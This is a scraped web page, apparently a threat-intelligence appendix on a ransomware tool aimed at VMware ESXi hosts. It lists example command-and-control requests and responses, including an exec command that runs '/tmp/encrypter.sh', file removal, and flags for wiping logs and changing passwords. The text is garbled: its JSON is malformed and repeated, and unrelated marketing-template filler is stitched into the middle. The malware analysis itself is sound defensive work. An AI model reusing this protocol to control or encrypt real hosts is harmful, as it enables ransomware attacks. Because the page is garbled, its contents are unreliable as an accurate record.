code test

Appendix C - Example Command & Control requests

Info

Example c2 request:

{
"type": "info"
}

Example response:

{

"type": "info",

"id": "localhost+08:00:27:ac:4b:55",

"taskId": "(null)",

"taskReply": "completed",

"data":

{

"config":

{

"host":

{

"startIn": 0,

"pass": "undefined",

"command": "undefined",

"command": "",

"args": []

"vms":

[{

"name": "test",

"folder":

"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55/test",

"priority": 2,

"group": 0

}]

"status":

{

"errors": [],

"ip": "192.168.56.10",

"hostType": 1,

"progress": -1,

"startsIn": -1,

"runIterations": 1,

"currentRunIteration": 1,

"passchange": "",

"dropsess": false,

"welcomeset": false,

"rmlogs": false,

"vms":

[{

"name": "test",

"folder":

"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55/test",

"datastoreMountPoint": "/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55",

"datastoreName": "datastore1",

"datastoreSize": "1.5G",

"done": 0,

"total": 3,

"processId": "",

"online": false,

"errors": [],

"files":

[{

"name": "test-flat.vmdk",

"state": 0

}, {

"Name": "test.vmdk",

"state": 0

}, {

"name": "test.vmsd",

"state": 0

}]

}

Config

Example c2 request:

{

"type": "config",

"config":
{

"host":
{

"startIn": 0,

"pass": "undefined",

"command": "undefined",

"command": "",

"args": []

}

Exec

Example c2 request:

{

"type": "exec",

"config":
{

"host":
{

"command": "/tmp/encrypter.sh"

}

Run

Example c2 request:

{

"type": "run",

"config":

{

"host":

{

"command": "uname -a"

}

Example c2 response:

{

"type": "info",

"id": "localhost+08:00:27:ac:4b:55",

"taskId": "(null)",

"taskReply": "completed",

"data":

{

"config":

{

"host":

{

"command": "uname -a",

"startIn": 0,

"pass": "undefined",

"command": "",

"args": []

"vms":

[{

"name": "test",

"folder":

"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55/test",

"priority": 2,

"group": 0

}]

"status":

{

"progress": -1,

"runIterations": 1,

"currentRunIteration": 1,

"dropsess": false,

"welcomeset": false,

"errors":

[{

"step": "",

"desc":

"VMkernel localhost 6.7.0 #1 SMP Release build-15160138 Nov 22 2019 20:49:31 x86_64 x86_64 x86_64 ESXi\n"

}],

"Ip": "192.168.56.10",

"hostType": 1,

"startsIn": -1,

"passchange": "",

"rmlogs": false,

"vms":

[{

"name": "test",

"folder":

"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55/test",

"datastoreMountPoint":

"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55",

"datastoreName": "datastore1",

"datastoreSize": "1.5G",

"done": 0,

"total": 3,

"processId": "",

"online": false,

"errors": [],

"files":

[{

"name": "test-flat.vmdk",

"state": 0

}, {

"name": "test.vmdk",

"state": 0

}, {

"name": "test.vmsd",

"state": 0

}]

}

Remove

Example c2 request:

{

"type": "remove",

"args": ["/tmp/test"]

}

Abort

Example c2 request:

{

"type": "abort"

}

Abort_f

Example c2 request:

{

"type": "abort_f"

}

Quit

Example c2 request:

{

"type": "quit"

}

Welcome

Example c2 request:

{

"type": "welcome",

"config":

{

"host":

{

"welcomeMsg": NEW-WELCOME-MESSAGE

}

{ "type": "info", "id": "localhost+08:00:27:ac:4b:55", "taskId": "(null)", "taskReply": "completed", "data": { "config": { "host": { "startIn": 0, "pass": "undefined", "command": "undefined", "command": "", "args": [] }, "vms": [{ "name": "test", "folder": "/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55/test", "priority": 2, "group": 0 }] }, "status": { "errors": [], "ip": "192.168.56.10", "hostType": 1, "progress": -1, "startsIn": -1, "runIterations": 1, "currentRunIteration": 1, "passchange": "", "dropsess": false, "welcomeset": false, "rmlogs": false, "vms": [{ "name": "test", "folder": "/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55/test", "datastoreMountPoint": "/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55", "datastoreName": "datastore1", "datastoreSize": "1.5G", "done": 0, "total": 3, "processId": "", "online": false, "errors": [], "files": [{ "name": "test-flat.vmdk", "state": 0 }, { "Name": "test.vmdk", "state": 0 }, { "name": "test.vmsd", "state": 0 }] }] } } }

Something Powerful

Tell The Reader More

The headline and subheader tells us what you're offering, and the form header closes the deal. Over here you can explain why your offer is so great it's worth filling out a form for.

Remember:

Bullets are great
For spelling out benefits and
Turning visitors into leads.

{
     "type":         "info",
     "id":      "localhost+08:00:27:ac:4b:55",
     "taskId":  "(null)",
     "taskReply":    "completed",
     "data":   
      {
          "config": 
          {
                "host":   
                {                               
                     "startIn": 0,                               
                     "pass":         "undefined",                               
                     "command": "undefined",                             
                     "command": "",                             
                     "args":    []
                },
                "vms":   
                [{                            
                    "name":    "test",                               
                    "folder": 
"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55/test",                               
                    "priority":     2,                              
                    "group":   0                      
                 }]
           },
           "status":
           {
                "errors":  [],
                "ip": "192.168.56.10",                     
                "hostType":     1,                     
                "progress":           -1,                     
                "startsIn":           -1,                     
                "runIterations":      1,                     
                "currentRunIteration":     1,                     
                "passchange":         "",                     
                "dropsess":           false,                     
                "welcomeset":         false,                     
                "rmlogs":       false,
                "vms":   
                [{                               
                     "name":    "test",                               
                     "folder":
"/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55/test",                               
                    "datastoreMountPoint":     "/vmfs/volumes/636659ac-e9b802a2-5a82-080027ac4b55",                               
                    "datastoreName": "datastore1",                               
                    "datastoreSize": "1.5G",                               
                    "done":               0,                               
                    "total":              3,                               
                    "processId":          "",                               
                    "online":       false,                               
                    "errors":       [],                               
                    "files":  
                    [{                               
                          "name":    "test-flat.vmdk",                               
                          "state":        0
                    }, {                              
                           "Name":    "test.vmdk",                               
                           "state":        0                               
                    }, {                              
                           "name":    "test.vmsd",                              
                           "state":   0
                    }]
                }]
          }
      }
}

Cyber Incident?

Call 00800 1744 0000

RansomHouse am See

Appendix C - Example Command & Control requests

Info

Example c2 request:

Example response:

Config

Example c2 request:

Exec

Example c2 request:

Run

Example c2 request:

Example c2 response:

Remove

Example c2 request:

Abort

Example c2 request:

Abort_f

Example c2 request:

Quit

Example c2 request:

Welcome

Example c2 request:

Something Powerful

Tell The Reader More

Business

Bytes

Behaviour